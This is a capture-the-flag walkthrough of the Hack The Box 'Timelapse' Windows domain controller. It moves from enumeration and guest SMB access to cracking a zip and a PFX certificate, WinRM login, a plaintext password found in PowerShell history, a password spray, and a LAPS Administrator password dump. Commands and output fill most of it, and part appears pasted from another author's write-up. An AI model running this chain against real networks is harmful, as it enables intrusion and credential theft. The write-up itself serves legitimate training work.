htb-timelaps
Nmap scan report for timelapse.htb (10.10.11.152) Host is up (0.024s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-04 15:41:22Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | ssl-cert: Subject: commonName=dc01.timelapse.htb | Not valid before: 2021-10-25T14:05:29 |_Not valid after: 2022-10-25T14:25:29 |_http-server-header: Microsoft-HTTPAPI/2.0 | tls-alpn: |_ http/1.1 |_ssl-date: 2025-06-04T15:42:43+00:00; +7h59m59s from scanner time. |_http-title: Not Found Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-06-04T15:42:03 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 91.75 seconds
As we have found in the Nmap scan the name of the AD domain, we can also list it through the next command, because the LDAP service is open.
┌──(bolke㉿bolke)-[~/htb/timelaps] └─$ ldapsearch -x -H ldap://10.10.11.152 -s base | grep defaultNamingContext defaultNamingContext: DC=timelapse,DC=htb
We will proceed to add to our /etc/hosts file the corresponding domain
We will proceed to list AD users through the Kerbrute tool as we have verified that the port of Kerberos (88) was open. At this point we find that we have been able to list that there is the user “Admninistrator” and “Guest.”
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ ./kerbrute_linux_amd64 userenum --dc 10.10.11.152 -d timelapse.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 06/03/25 - Ronnie Flathers @ropnop
2025/06/03 11:22:05 > Using KDC(s):
2025/06/03 11:22:05 > 10.10.11.152:88
2025/06/03 11:22:08 > [+] VALID USERNAME: guest@timelapse.htb
2025/06/03 11:22:15 > [+] VALID USERNAME: administrator@timelapse.htb
As we have seen, the SMB service is on display, we will proceed to check what resources are shared in Samba.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ smbclient -L 10.10.11.152 -N 2>/dev/null
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
We will proceed to try to check with netexec if we can access the user “guest” without password and check what type of permissions he has in the shared resources. We find that he has reading permissions to “Shares” and “IPC$” resources.
┌──(bolke㉿bolke)-[~/htb/timelaps] └─$ netexec smb 10.10.11.152 -u guest -p "" --shares SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False) SMB 10.10.11.152 445 DC01 [+] timelapse.htb\guest: SMB 10.10.11.152 445 DC01 [*] Enumerated shares SMB 10.10.11.152 445 DC01 Share Permissions Remark SMB 10.10.11.152 445 DC01 ----- ----------- ------ SMB 10.10.11.152 445 DC01 ADMIN$ Remote Admin SMB 10.10.11.152 445 DC01 C$ Default share SMB 10.10.11.152 445 DC01 IPC$ READ Remote IPC SMB 10.10.11.152 445 DC01 NETLOGON Logon server share SMB 10.10.11.152 445 DC01 Shares READ SMB 10.10.11.152 445 DC01 SYSVOL Logon server share
Once the access has been checked, we will proceed to connect to the shared resource “Shares” with the user “guest” and proceed to list the directory in search of files, we will download it in our Kali to analyze them.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ smbclient //10.10.11.152/Shares -U timelapse.htb/guest
Password for [TIMELAPSE.HTB\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
6367231 blocks of size 4096. 1245104 blocks available
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 21:40:06 2021
.. D 0 Mon Oct 25 21:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 17:46:42 2021
6367231 blocks of size 4096. 1244807 blocks available
smb: \Dev\> mget *
Get file winrm_backup.zip? y
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (5.4 KiloBytes/sec) (average 5.4 KiloBytes/sec)
smb: \Dev\> cd ..
smb: \> cd Helpdesk
smb: \Helpdesk\> mget *
Get file LAPS.x64.msi? y
getting file \Helpdesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (541.9 KiloBytes/sec) (average 440.6 KiloBytes/sec)
Get file LAPS_Datasheet.docx? y
getting file \Helpdesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (99.8 KiloBytes/sec) (average 341.3 KiloBytes/sec)
Get file LAPS_OperationsGuide.docx? y
getting file \Helpdesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (599.9 KiloBytes/sec) (average 400.6 KiloBytes/sec)
Get file LAPS_TechnicalSpecification.docx? y
getting file \Helpdesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (82.1 KiloBytes/sec) (average 349.7 KiloBytes/sec)
smb: \Helpdesk\>
Through the fcrackzip tool we will proceed to try to crack the password of a .zip that we have downloaded from the shared SMB recuro. Using this tool and passing you a password dictionary we finally check that you have cracked the password.
┌──(bolke㉿bolke)-[~/htb/timelaps] └─$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip PASSWORD FOUND!!!!: pw == supremelegacy
We will proceed to decompress the .zip with the password we have created, The output is a PFX file which contains an SSL certificate in PKCS#12 format and a private key. PFX
files can be used by WinRM in order to login without a password.
┌──(bolke㉿bolke)-[~/htb/timelaps] └─$ unzip winrm_backup.zip Archive: winrm_backup.zip [winrm_backup.zip] legacyy_dev_auth.pfx password: inflating: legacyy_dev_auth.pfx
Obtain Keys
Crack pfx Password
This post shows the openssl commands to extract the private key and certificate (public key) from a .pfx file. Unfortunately, this one requires a password:
puck@hacky$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:
pfx2john.py will generate a hash for it (piped into tee to both save it to a file and examine the output):
puck@hacky$ pfx2john.py legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash
legacyy_dev_auth.pfx:$pfxng$1$20$2000$20$eb755568327396de179c4a<snip>0ae18a$30cc74f0e893:::::legacyy_dev_auth.pfx
This time it takes john about half a minute to find the password “thuglegacy”:
puck@hacky$ john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:24 DONE (2025-06-01 16:24) 0.04115g/s 132993p/s 132993c/s 132993C/s thuglife03282006..thscndsp1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Extract Keys
With the password, I can extract the key and certificate. When extracting the key, it asks for the password (I’ll provide “thuglegacy”), and then a password for the output .pem file (anything I want, must be at least four characters):
puck@hacky$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
I’ll decrypt the key using the password I set above so I don’t have to remember it:
puck@hacky$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key
And dump the certificate:
puck@hacky$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:
Now both files exist:
┌──(bolke㉿bolke)-[~/htb/timelaps] └─$ ls -la legacyy_dev_auth.* -rw------- 1 bolke bolke 1232 Jun 3 11:44 legacyy_dev_auth.crt -rw------- 1 bolke bolke 1704 Jun 3 11:43 legacyy_dev_auth.key -rw------- 1 bolke bolke 2134 Jun 3 11:43 legacyy_dev_auth.key-enc -rwxr-xr-x 1 bolke bolke 2555 Oct 25 2021 legacyy_dev_auth.pfx -rw-rw-r-- 1 bolke bolke 5077 Jun 3 11:35 legacyy_dev_auth.pfx.hash
.
Evil-WinRM
evil-winrm is the best tool for connecting to WinRM from a Linux host. Looking at the usage shows how I’ll use these keys to connect:
puck@hacky$ evil-winrm -h
Evil-WinRM shell v3.3
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
--spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP)
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash HASH NTHash
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-n, --no-colors Disable colors
-N, --no-rpath-completion Disable remote path completion
-l, --log Log the WinRM session
-h, --help Display this help message
I’ll use the following:
-S– Enable SSL, because I’m connecting to 5986;-c legacyy_dev_auth.crt– provide the public key certificate-k legacyy_dev_auth.key– provide the private key-i timelapse.htb– host to connect to
It works to get a shell as legacyy:
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents>
legaccy has user.txt
We will proceed to check the Powershell history of the “legacyy” user who is the one we have accessed with. We will check that a series of “Script” appears in which the password appears in the user’s flat text “svc-deploy.”
*Evil-WinRM* PS C:\Users\legacyy\Documents> type $env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
*Evil-WinRM* PS C:\Users\legacyy\Documents>
Mainly the password belongs to the user “svc.deploy” but we will try to check if the password serves other AD users. To do this we will export all AD users to a text file and download it to our local team.
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-ADUser -Filter * | Select-Object -ExpandProperty Name > usersAD.txt *Evil-WinRM* PS C:\Users\legacyy\Documents> type usersAD.txt Administrator Guest krbtgt TheCyberGeek Payl0ad Legacyy Sinfulz Babywyrm svc_deploy TRX
┌──(bolke㉿bolke)-[~/htb/timelaps] └─$ netexec winrm 10.10.11.152 -u usersAD.txt -p 'E3R$Q62^12p7PLlC%KWaxuaV' WINRM-SSL 10.10.11.152 5986 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:timelapse.htb) WINRM-SSL 10.10.11.152 5986 DC01 [-] timelapse.htb\Administrator:E3R$Q62^12p7PLlC%KWaxuaV WINRM-SSL 10.10.11.152 5986 DC01 [-] timelapse.htb\Guest:E3R$Q62^12p7PLlC%KWaxuaV WINRM-SSL 10.10.11.152 5986 DC01 [-] timelapse.htb\krbtgt:E3R$Q62^12p7PLlC%KWaxuaV WINRM-SSL 10.10.11.152 5986 DC01 [-] timelapse.htb\TheCyberGeek:E3R$Q62^12p7PLlC%KWaxuaV WINRM-SSL 10.10.11.152 5986 DC01 [-] timelapse.htb\Payl0ad:E3R$Q62^12p7PLlC%KWaxuaV WINRM-SSL 10.10.11.152 5986 DC01 [-] timelapse.htb\Legacyy:E3R$Q62^12p7PLlC%KWaxuaV WINRM-SSL 10.10.11.152 5986 DC01 [-] timelapse.htb\Sinfulz:E3R$Q62^12p7PLlC%KWaxuaV WINRM-SSL 10.10.11.152 5986 DC01 [-] timelapse.htb\Babywyrm:E3R$Q62^12p7PLlC%KWaxuaV WINRM-SSL 10.10.11.152 5986 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV (Pwn3d!)
We will proceed again to connect to the WinRM with the user and the credentials found, we verify that we gain access as a user “svc-deploy.”
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
net user svc_deployshows that we are part of the LAPS_Readers group. The “Local Administrator Password Solution” (LAPS) is used to manage local account passwords ofActive Directory computers.
We will proceed to list the user passwords Administrators of all AD teams to take advantage of LAPS to extract the credentials. We found we found a password.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -Filter * -Property ms-MCS-AdmPwd | Select-Object Name, ms-MCS-AdmPwd Name ms-MCS-AdmPwd ---- ------------- DC01 !BM0/5NB1.$,iUGG5vQYdY4u DB01 WEB01 DEV01
We can also make use of the ldapsearch tool with the following command to perform the same as the previous step.
┌──(bolke㉿bolke)-[~/htb/timelaps] └─$ ldapsearch -x -H ldap://10.10.11.152 -D 'svc_deploy' -w 'E3R$Q62^12p7PLlC%KWaxuaV' -b 'dc=timelapse,dc=htb' '(objectClass=computer)' ms-MCS-AdmPwd # extended LDIF # # LDAPv3 # base <dc=timelapse,dc=htb> with scope subtree # filter: (objectClass=computer) # requesting: ms-MCS-AdmPwd # # DC01, Domain Controllers, timelapse.htb dn: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb ms-Mcs-AdmPwd: !BM0/5NB1.$,iUGG5vQYdY4u # DB01, Database, Servers, timelapse.htb dn: CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb # WEB01, Web, Servers, timelapse.htb dn: CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb # DEV01, Dev, Servers, timelapse.htb dn: CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb # search reference ref: ldap://ForestDnsZones.timelapse.htb/DC=ForestDnsZones,DC=timelapse,DC=htb # search reference ref: ldap://DomainDnsZones.timelapse.htb/DC=DomainDnsZones,DC=timelapse,DC=htb # search reference ref: ldap://timelapse.htb/CN=Configuration,DC=timelapse,DC=htb # search result search: 2 result: 0 Success # numResponses: 8 # numEntries: 4 # numReferences: 3
We will proceed to connect to the computer with the user Administrator and the credentials found. We see that we have gained access as an Administrator user.
To locate the flag of the root.txt” we will run the following command to search for the flag on all the “Desktop” of all users of the computer, as the flag is on another user.
┌──(bolke㉿bolke)-[~/htb/timelaps]
└─$ evil-winrm -i 10.10.11.152 -u Administrator -p '!BM0/5NB1.$,iUGG5vQYdY4u' -S
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path "C:\Users" -Recurse -Filter "root.txt" -ErrorAction SilentlyContinue | Where-Object { $_.Directory -like "*\Desktop" }
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/4/2025 7:33 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents>
That was fun.